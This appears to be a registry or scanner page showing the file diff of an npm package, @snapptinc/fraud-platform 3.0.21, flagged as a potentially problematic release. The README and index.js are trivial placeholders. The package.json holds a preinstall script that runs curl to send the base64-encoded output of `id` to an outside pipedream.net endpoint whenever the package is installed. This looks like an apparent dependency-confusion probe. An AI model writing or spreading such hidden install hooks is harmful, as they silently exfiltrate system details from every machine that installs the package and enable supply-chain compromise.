@snapptinc/fraud-platform 3.0.21
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @snapptinc/fraud-platform might be problematic. Click here for more details.
- package/README.md +1 -0
- package/index.js +1 -0
- package/package.json +13 -0
package/README.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
`hello :D`
|
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
console.log(123)
|
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "@snapptinc/fraud-platform",
|
3
|
+
"version": "3.0.21",
|
4
|
+
"description": "hackerone-tosun",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "curl -d $(id | base64) https://db45d972f8dcc1c11b2885c8c7ae5e52.m.pipedream.net/"
|
9
|
+
},
|
10
|
+
"author": "tosun@hackerone",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {}
|
13
|
+
}
|